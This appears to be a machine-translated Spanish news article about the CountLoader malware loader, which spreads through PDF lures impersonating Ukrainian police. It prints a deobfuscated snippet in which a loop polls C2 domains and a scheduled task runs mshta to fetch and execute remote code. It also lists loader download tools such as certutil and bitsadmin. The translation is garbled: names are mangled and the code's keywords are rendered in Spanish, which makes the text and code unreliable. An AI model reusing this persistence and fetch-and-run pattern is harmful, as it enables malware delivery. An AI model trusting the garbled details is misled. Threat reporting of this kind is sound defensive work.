En los últimos meses, los equipos de seguridad han observado la aparición de un cargador de malware sofisticado, denominado condenador, que aprovecha los archivos PDF armados para entregar cargas útiles de ransomware.
Detectado por primera vez a fines de agosto de 2025, CountLoader está vinculado a múltiples grupos cibercriminales de habla rusa, incluidos los afiliados de Lockbit, Blackbasta y Qilin.
Al disfrazarse como documentos legítimos, a menudo suplantando la aplicación de la ley ucraniana, este cargador aprovecha la ingeniería social y las cadenas de exploits PDF para obtener un punto de apoyo inicial en los entornos objetivo.
La metodología de implementación de CountLoader gira en torno a tres versiones distintas escritas en JScript (.hta), .NET y PowerShell.
Cada variante exhibe atributos únicos: la versión JScript ofrece la funcionalidad más completa con múltiples métodos de descarga y ejecución, el binario .NET impone un interruptor de asesinato codificado después de una fecha preestablecida, y el script PowerShell persiste como un cargador conciso con una ejecución reflexiva en la memoria.
Analistas de empuje silencioso anotado Que todas las variantes incorporan un protocolo de comunicación C2 personalizado que emplea rutinas de cifrado XOR y Base64 para ocultar su tráfico de control.
El impacto del contexto se extiende mucho más allá del mero acceso inicial. Tras la ejecución exitosa, los detalles específicos del dispositivo de huellas dactilares del cargador, como identificadores de hardware, membresía de dominio y presencia de productos antivirus, para generar una ID de víctima única.
Luego se involucra en bucles de votación C2 persistentes, descargando cargas útiles secundarias, como balizas de ataque de cobalto, implantes de adaptix y purahvnc traseras.
Las organizaciones con sistemas de unión de dominio en Europa del Este han sido los objetivos principales, lo que sugiere una selección estratégica de entidades corporativas y gubernamentales.
PDF señuelo que se hace pasar por la policía ucraniana (Fuente – Push Silent)
CountLoader se entregó notablemente a través de un señuelo de phishing basado en PDF que se sufre a la Policía Nacional de Ucrania. El PDF malicioso contenía un objeto de aplicación HTML incrustado que desencadenó mshta.exe para obtener y ejecutar el cargador JScript.
Al abrir el documento, las víctimas se encontraron con una notificación oficial que les indicaba que “inicien su solicitud” a través de un enlace integrado, que inició el proceso de descarga del cargador.
Mecanismo de infección
El mecanismo de infección del contexto comienza con el PDF armado que explota la interacción del usuario en lugar de las vulnerabilidades de día cero.
El PDF incrusta un objeto HTA que invoca el motor MSHTA de Windows cuando se hace clic.
Este script HTA se ofusca utilizando un ofuscador de JavaScript gratuito y contiene alrededor de 850 líneas de código.
Función primaria (Fuente – Push Silent)
Después de la deobfuscación, el bucle principal responsable del contacto C2 es visible:
para (let i = 1; i <= 10; i ++) {dejar c2url = `https: // ms-team-ping $ {i} .com/api/getfile? fn = checkStatus`; Let respuesta = checkStatUsc2ReturnDecryptedResponse (C2URL, Vicimfingerprint); if (respuesta === "éxito") {ConnectandaUthenticate (c2url.replace ("checkstatus", "conectar"), vicimfingerprint); romper; }} // Creación de tareas programada para persistencia createScheduledTask ({nombre: "GoogleupdaterTaskSystem", comando: `mshta https: // $ {envvar} .example.com/inicio`, retraso:" PT10M "});
Tras un contacto exitoso, CountLower aprovecha las solicitudes de publicación HTTP con tokens personalizados obtenidos del C2 para obtener tareas.
Estas tareas incluyen descargar ejecutables a través de WinHTTP, MSXML2, CURL, Bitsadmin o Certutil, demostrando la adaptabilidad del cargador y el conocimiento profundo del sistema.
Una vez que se ejecutan las tareas, CountLoader informa la finalización del servidor, asegurando una administración de tareas sólida.
Este flujo de trabajo de infección subraya el diseño del conteo del conteo como un cargador altamente modular y persistente, capaz de entregar diversas herramientas de ransomware y después de la explotación mientras evade la detección a través de la ofuscación y las comunicaciones encriptadas.
¡Encuentra esta historia interesante! Séguenos Google News, LinkedIny incógnita Para obtener más actualizaciones instantáneas.
